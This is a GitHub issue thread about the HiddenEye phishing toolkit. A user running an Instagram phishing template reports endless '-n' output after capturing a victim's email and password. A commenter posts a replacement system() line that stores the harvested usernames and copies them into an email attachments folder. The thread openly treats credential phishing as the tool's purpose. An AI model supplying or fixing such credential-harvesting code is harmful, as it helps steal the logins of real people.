### ISSUE TITLE
HiddenEye Prints "-n"

### ISSUE THREAD

**Issue by yeview** [DarkSecDevelopers/HiddenEye#471]
After the first user logged in, the terminal prints -n infinitely many time
What should I do? I use macOS Catalina
It's like:
[EMAIL]: asdasd [PASS]: asdasd
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n 
-n

**Comment by An0nUD4Y** [comment]
@yeview Can you share screenshot.

**Comment by Mxtheus77** [comment]
Help-me, man
![Screenshot_2019-12-14_08-53-12](https://user-images.githubusercontent.com/58880165/70848465-022b9a00-1e6a-11ea-9004-bddded9b6007.png)

**Comment by Mxtheus77** [comment]
Help-me, man
![Screenshot_2019-12-14_09-14-35](https://user-images.githubusercontent.com/58880165/70848550-33f13080-1e6b-11ea-8095-58888ddc605c.png)

**Comment by alperenbizel** [comment]
Ok

14 Ara 2019 Cmt 15:14 tarihinde Mxtheus77 <notifications@github.com> şunu
yazdı:

**Comment by yeview** [comment]
> @yeview Can you share screenshot.

yes, sure
<img width="565" alt="Screen Shot 2019-12-15 at 23 04 06" src="https://user-images.githubusercontent.com/53772525/70866076-51b7b600-1f8f-11ea-8564-8225f6db9aaf.png">

**Comment by An0nUD4Y** [comment]
@yeview  What phishing Template you have used..

**Comment by yeview** [comment]
> @yeview What phishing Template you have used..

Instagram standart web page

**Comment by originalsaban** [comment]
Edit the line 1132 just overwrite the code with this one:

system("touch Server/CapturedData/usernames.txt && cat Server/www/usernames.txt >> Server/CapturedData/usernames.txt && cp Server/CapturedData/usernames.txt Defs/Send_Email/attachments/usernames.txt> Server/www/usernames.txt")

**Comment by chiefofcoding** [comment]
i once experience this inbox me chieflyx@gmail.com
